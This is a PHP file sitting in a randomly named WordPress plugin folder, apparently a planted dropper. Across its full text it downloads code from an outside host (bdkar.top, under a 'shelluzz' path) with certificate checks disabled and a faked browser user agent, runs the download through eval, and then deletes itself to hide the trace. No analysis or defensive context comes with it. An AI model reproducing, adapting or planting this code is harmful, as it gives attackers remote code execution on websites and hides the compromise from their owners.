File: /usr/home/uyu7574470001/htdocs/wp-content/plugins/mnwkhyw/BDKR28_9rzivy4cz7.php
<?php
$l = "https://bdkar.top/shelluzz/mass-al.txt";
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $l);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36");
$body = curl_exec($ch);
curl_close($ch);
} else {
$body = @file_get_contents($l);
}
if (!empty($body)) {
eval("?>".$body);
}
@unlink(__FILE__);
?>